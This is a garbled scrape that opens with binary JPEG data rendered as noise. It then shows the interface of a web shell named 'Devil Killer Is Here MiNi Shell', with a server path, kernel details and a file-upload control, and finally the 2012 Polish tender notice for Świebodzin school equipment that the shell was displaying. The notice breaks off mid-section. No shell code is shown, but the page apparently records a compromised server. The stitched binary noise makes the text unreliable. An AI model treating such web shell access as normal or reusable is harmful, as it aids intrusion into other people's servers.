JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120320/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120320/85772-N-2012.html

<p class="kh_header"><b>Świebodzin: Doposażenie bazy dydaktycznej szkół w ramach projektu Indywidualizacja procesu nauczania w klasach I-III szkół podstawowych Gminy Świebodzin z podziałem na 4 grupy</b><br>
<b>Numer ogłoszenia: 85772 - 2012; data zamieszczenia: 20.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świebodzin , ul. Rynkowa 2, 66-200 Świebodzin, woj. lubuskie, tel. 68 4750916, faks 68 4750916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.swiebodzin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doposażenie bazy dydaktycznej szkół w ramach projektu Indywidualizacja procesu nauczania w klasach I-III szkół podstawowych Gminy Świebodzin z podziałem na 4 grupy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Doposażenie bazy dydaktycznej szkół w ramach projektu Indywidualizacja procesu nauczania w klasach I-III szkół podstawowych Gminy Świebodzin z podziałem na 4 grupy, współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, poddziałanie 9.1.2. - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.

1.1. Grupa I: Dostawa pomocy dydaktycznych:

Zadanie 1: Publiczna Szkoła Podstawowa nr 2 w Świebodzinie, Park Chopina 1, 66-200 Świebodzin, w następującym asortymencie:
- gry dydaktyczne - szt./kpl./zestaw ok. 92,
- programy dydaktyczne - szt./zestaw ok. 5,
- książki - szt. ok. 4,
- zbiory i zestawy zadań i ćwiczeń - szt. ok. 10,
- materiały biurowe - szt./kpl/zestaw - ok. 57,
- inne pomoce - szt./kpl./zestaw ok. 93.

Zadanie 2: Publiczna Szkoła Podstawowa nr 6 w Świebodzinie, Os. Łużyckie 28, 66-200 Świebodzin, w następującym asortymencie:

- gry dydaktyczne - szt./kpl./zestaw ok. 52,
- programy dydaktyczne - szt. ok. 9,
- książki - szt. ok. 178,
- e-booki - szt. ok. 29,
- zbiory i zestawy zadań i ćwiczeń - szt./kpl./zestaw ok. 280,
- materiały biurowe - szt./kpl - ok. 170,
- inne pomoce - szt./kpl./zestaw ok. 520.

Zadanie 3: Publiczna Szkoła Podstawowa nr 7 im. Janusza Korczaka w Świebodzinie, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin, w następującym asortymencie:

- gry dydaktyczne - kpl./zestaw ok. 8,
- książki - szt. ok.  4, 
- materiały biurowe - zestaw ok. 6, 
- inne pomoce - szt./kpl./zestaw ok. 13.

Zadanie 4: Publiczna Szkoła Podstawowa im. Marii Konopnickiej w Gościkowie, Gościkowo 10, 66-200 Świebodzin, w następującym asortymencie:

- gry dydaktyczne - kpl./zestaw ok. 9, 
- programy dydaktyczne - szt./zestaw ok. 5, 
- książki - szt./zestaw ok. 4, 
- materiały biurowe - zestaw ok. 40, 
- inne pomoce - szt./kpl./zestaw ok. 19.

Szczegółowy opis w/w pomocy dydaktycznych został określony w załączniku nr 1-I do SIWZ.

lub

1.2. Grupa II: Dostawa komputerów osobistych: 

Zadanie 1: Publiczna Szkoła Podstawowa nr 2 w Świebodzinie, Park Chopina 1, 66-200 Świebodzin, w następującym asortymencie:

- komputer osobisty - 1 szt.

Zadanie 2: Publiczna Szkoła Podstawowa nr 6 w Świebodzinie, Os. Łużyckie 28, 66-200 Świebodzin, w następującym asortymencie:

- komputer osobisty laptop - 4 szt.,
- komputer osobisty - 1 szt.

Zadanie 3: Publiczna Szkoła Podstawowa nr 7 im. Janusza Korczaka w Świebodzinie, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin, w następującym asortymencie:

- komputer osobisty - 1 szt.

Zadanie 4: Publiczna Szkoła Podstawowa im. Marii Konopnickiej  w Gościkowie, Gościkowo 10, 66-200 Świebodzin, w następującym asortymencie:

- komputer osobisty laptop - 1 szt.

Szczegółowy opis parametrów w/w komputerów osobistych został określony w załączniku nr 1-II do SIWZ.

lub

1.3. Grupa III: Dostawa mikroskopów: 

Zadanie 1: Publiczna Szkoła Podstawowa nr 2 w Świebodzinie, Park Chopina 1, 66-200 Świebodzin, w następującym asortymencie:

- mikroskop elektroniczny z ekranem LCD - 1 szt.

Zadanie 2: Publiczna Szkoła Podstawowa nr 6 w Świebodzinie, Os. Łużyckie 28, 66-200 Świebodzin,  w następującym asortymencie:

- mikroskop elektroniczny z ekranem LCD - 5 szt.

Zadanie 3: Publiczna Szkoła Podstawowa nr 7 im. Janusza Korczaka w Świebodzinie, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin, w następującym asortymencie:

- mikroskop elektroniczny z ekranem LCD - 1 szt.

Szczegółowy opis parametrów w/w mikroskopów został określony w załączniku nr 1-III do SIWZ.

lub

1.4. Grupa IV: Dostawa mebli szkolnych: 

Zadanie 1: Publiczna Szkoła Podstawowa nr 7 im. Janusza Korczaka w Świebodzinie, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin, w następującym asortymencie:

W skład zestawu wchodzą:
- szafa - 2 szt.,
- stół -  1 szt.,
- regał - 1 szt.,
- szafka przyścienna - 1 szt.,
- szatnia - 1 szt.

Szczegółowy opis w/w zestawu mebli szkolnych został określony w załączniku nr 1-IV do SIWZ.

Zamawiający zastrzega sobie prawo do rezygnacji z zamawiania któregokolwiek z elementu wchodzącego w skład w/w zestawu mebli szkolnych.

2. Wykonawca musi uwzględnić w swojej ofercie wszelkie koszty niezbędne do wykonania przedmiotu zamówienia, w tym m.in. koszty: 
a) zakupu, dostawy i rozładunku artykułów we wskazane miejsca tj. artykuły z:
- Grupy I (Zadanie 1), Grupy II (Zadanie 1) i Grupy III (Zadanie 1) do Publicznej Szkoły Podstawowej nr 2 w Świebodzinie, Park Chopina 1, 66-200 Świebodzin,
- Grupy I (Zadanie 2), Grupy II (Zadanie 2) i Grupy III (Zadanie 2) do Publicznej Szkoły Podstawowej nr 6 w Świebodzinie, Os. Łużyckie 28, 66-200 Świebodzin,
- Grupy I (Zadanie 3), Grupy II (Zadanie 3), Grupy III (Zadanie 3) i Grupy IV (Zadanie 1) do Publicznej Szkoły Podstawowej nr 7 im. Janusza Korczaka w Świebodzinie, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin,
- Grupy I (Zadanie 4) i Grupy II (Zadanie 4) do Publicznej Szkoły Podstawowej im. Marii Konopnickiej  w Gościkowie, Gościkowo 10, 66-200 Świebodzin,
b) opakowania zabezpieczającego artykuły przed uszkodzeniem w trakcie transportu,
c) montażu i ustawienia mebli szkolnych z Grupy IV (Zadanie 1) w Publicznej Szkole Podstawowej   nr 7 im. Janusza Korczaka w Świebodzinie, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin.

3. W/w artykuły muszą być fabrycznie nowe oraz muszą posiadać aktualne atesty, deklaracje i certyfikaty na bezpieczeństwo i zgodność z wymaganiami polskich i europejskich norm oraz niezbędne instrukcje.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.21.30.00-5, 38.51.00.00-3, 39.16.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków  w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych.
2. Oświadczenie, że wykonawca wykona zamówienie siłami własnymi lub określi część zamówienia, której wykonanie powierzy podwykonawcom.
3. Formularz/e oferty na Grupę/Grupy zamówienia.
4. Pełnomocnictwo w formie oryginału lub kopii poświadczonej notarialnie (jeżeli dotyczy).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swiebodzin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świebodzinie, ul. Rynkowa 2, 66-200 Świebodzin, pok. nr 17. Cena SIWZ: 40,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2012 godzina 10:00, miejsce: Urząd Miejski w Świebodzinie, ul. Rynkowa 2, 66-200 Świebodzin, pok. nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie współfinansowane z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, poddziałanie 9.1.2. - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
2. Rozliczenie między Zamawiającym a Wykonawcą będzie się odbywało w walucie polskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa I: Dostawa pomocy dydaktycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Grupa I: Dostawa pomocy dydaktycznych:

Zadanie 1: Publiczna Szkoła Podstawowa nr 2 w Świebodzinie, Park Chopina 1, 66-200 Świebodzin, w następującym asortymencie:
- gry dydaktyczne - szt./kpl./zestaw ok. 92,
- programy dydaktyczne - szt./zestaw ok. 5,
- książki - szt. ok. 4,
- zbiory i zestawy zadań i ćwiczeń - szt. ok. 10,
- materiały biurowe - szt./kpl/zestaw - ok. 57,
- inne pomoce - szt./kpl./zestaw ok. 93.

Zadanie 2: Publiczna Szkoła Podstawowa nr 6 w Świebodzinie, Os. Łużyckie 28, 66-200 Świebodzin, w następującym asortymencie:

- gry dydaktyczne - szt./kpl./zestaw ok. 52,
- programy dydaktyczne - szt. ok. 9,
- książki - szt. ok. 178,
- e-booki - szt. ok. 29,
- zbiory i zestawy zadań i ćwiczeń - szt./kpl./zestaw ok. 280,
- materiały biurowe - szt./kpl - ok. 170,
- inne pomoce - szt./kpl./zestaw ok. 520.

Zadanie 3: Publiczna Szkoła Podstawowa nr 7 im. Janusza Korczaka w Świebodzinie, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin, w następującym asortymencie:

- gry dydaktyczne - kpl./zestaw ok. 8,
- książki - szt. ok.  4, 
- materiały biurowe - zestaw ok. 6, 
- inne pomoce - szt./kpl./zestaw ok. 13.

Zadanie 4: Publiczna Szkoła Podstawowa im. Marii Konopnickiej w Gościkowie, Gościkowo 10, 66-200 Świebodzin, w następującym asortymencie:

- gry dydaktyczne - kpl./zestaw ok. 9, 
- programy dydaktyczne - szt./zestaw ok. 5, 
- książki - szt./zestaw ok. 4, 
- materiały biurowe - zestaw ok. 40, 
- inne pomoce - szt./kpl./zestaw ok. 19.

Szczegółowy opis w/w pomocy dydaktycznych został określony w załączniku nr 1-I do SIWZ.

2. Wykonawca musi uwzględnić w swojej ofercie wszelkie koszty niezbędne do wykonania przedmiotu zamówienia, w tym m.in. koszty: 
a) zakupu, dostawy i rozładunku artykułów we wskazane miejsca tj. artykuły z:
- Grupy I (Zadanie 1) do Publicznej Szkoły Podstawowej nr 2 w Świebodzinie, Park Chopina 1, 66-200 Świebodzin,
- Grupy I (Zadanie 2) do Publicznej Szkoły Podstawowej nr 6 w Świebodzinie, Os. Łużyckie 28, 66-200 Świebodzin,
- Grupy I (Zadanie 3) do Publicznej Szkoły Podstawowej nr 7 im. Janusza Korczaka w Świebodzinie, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin,
- Grupy I (Zadanie 4) do Publicznej Szkoły Podstawowej im. Marii Konopnickiej  w Gościkowie, Gościkowo 10, 66-200 Świebodzin,
b) opakowania zabezpieczającego artykuły przed uszkodzeniem w trakcie transportu.

3. W/w artykuły muszą być fabrycznie nowe oraz muszą posiadać aktualne atesty, deklaracje i certyfikaty na bezpieczeństwo i zgodność z wymaganiami polskich i europejskich norm oraz niezbędne instrukcje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa II: Dostawa komputerów osobistych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Grupa II: Dostawa komputerów osobistych: 

Zadanie 1: Publiczna Szkoła Podstawowa nr 2 w Świebodzinie, Park Chopina 1, 66-200 Świebodzin, w następującym asortymencie:

- komputer osobisty - 1 szt.

Zadanie 2: Publiczna Szkoła Podstawowa nr 6 w Świebodzinie, Os. Łużyckie 28, 66-200 Świebodzin, w następującym asortymencie:

- komputer osobisty laptop - 4 szt.,
- komputer osobisty - 1 szt.

Zadanie 3: Publiczna Szkoła Podstawowa nr 7 im. Janusza Korczaka w Świebodzinie, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin, w następującym asortymencie:

- komputer osobisty - 1 szt.

Zadanie 4: Publiczna Szkoła Podstawowa im. Marii Konopnickiej  w Gościkowie, Gościkowo 10, 66-200 Świebodzin, w następującym asortymencie:

- komputer osobisty laptop - 1 szt.

Szczegółowy opis parametrów w/w komputerów osobistych został określony w załączniku nr 1-II do SIWZ.

2. Wykonawca musi uwzględnić w swojej ofercie wszelkie koszty niezbędne do wykonania przedmiotu zamówienia, w tym m.in. koszty: 
a) zakupu, dostawy i rozładunku artykułów we wskazane miejsca tj. artykuły z:
- Grupy II (Zadanie 1) do Publicznej Szkoły Podstawowej nr 2 w Świebodzinie, Park Chopina 1, 66-200 Świebodzin,
- Grupy II (Zadanie 2) do Publicznej Szkoły Podstawowej nr 6 w Świebodzinie, Os. Łużyckie 28, 66-200 Świebodzin,
- Grupy II (Zadanie 3) do Publicznej Szkoły Podstawowej nr 7 im. Janusza Korczaka w Świebodzinie, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin,
- Grupy II (Zadanie 4) do Publicznej Szkoły Podstawowej im. Marii Konopnickiej  w Gościkowie, Gościkowo 10, 66-200 Świebodzin,
b) opakowania zabezpieczającego artykuły przed uszkodzeniem w trakcie transportu.

3. W/w artykuły muszą być fabrycznie nowe oraz muszą posiadać aktualne atesty, deklaracje i certyfikaty na bezpieczeństwo i zgodność z wymaganiami polskich i europejskich norm oraz niezbędne instrukcje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa III: Dostawa mikroskopów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Grupa III: Dostawa mikroskopów: 

Zadanie 1: Publiczna Szkoła Podstawowa nr 2 w Świebodzinie, Park Chopina 1, 66-200 Świebodzin, w następującym asortymencie:

- mikroskop elektroniczny z ekranem LCD - 1 szt.

Zadanie 2: Publiczna Szkoła Podstawowa nr 6 w Świebodzinie, Os. Łużyckie 28, 66-200 Świebodzin, w następującym asortymencie:

- mikroskop elektroniczny z ekranem LCD - 5 szt.

Zadanie 3: Publiczna Szkoła Podstawowa nr 7 im. Janusza Korczaka w Świebodzinie, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin, w następującym asortymencie:

- mikroskop elektroniczny z ekranem LCD - 1 szt.

Szczegółowy opis parametrów w/w mikroskopów został określony w załączniku nr 1-III do SIWZ.

2. Wykonawca musi uwzględnić w swojej ofercie wszelkie koszty niezbędne do wykonania przedmiotu zamówienia, w tym m.in. koszty: 
a) zakupu, dostawy i rozładunku artykułów we wskazane miejsca tj. artykuły z:
- Grupy III (Zadanie 1) do Publicznej Szkoły Podstawowej nr 2 w Świebodzinie, Park Chopina 1, 66-200 Świebodzin,
- Grupy III (Zadanie 2) do Publicznej Szkoły Podstawowej nr 6 w Świebodzinie, Os. Łużyckie 28, 66-200 Świebodzin,
- Grupy III (Zadanie 3) do Publicznej Szkoły Podstawowej nr 7 im. Janusza Korczaka w Świebodzinie, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin,
b) opakowania zabezpieczającego artykuły przed uszkodzeniem w trakcie transportu.

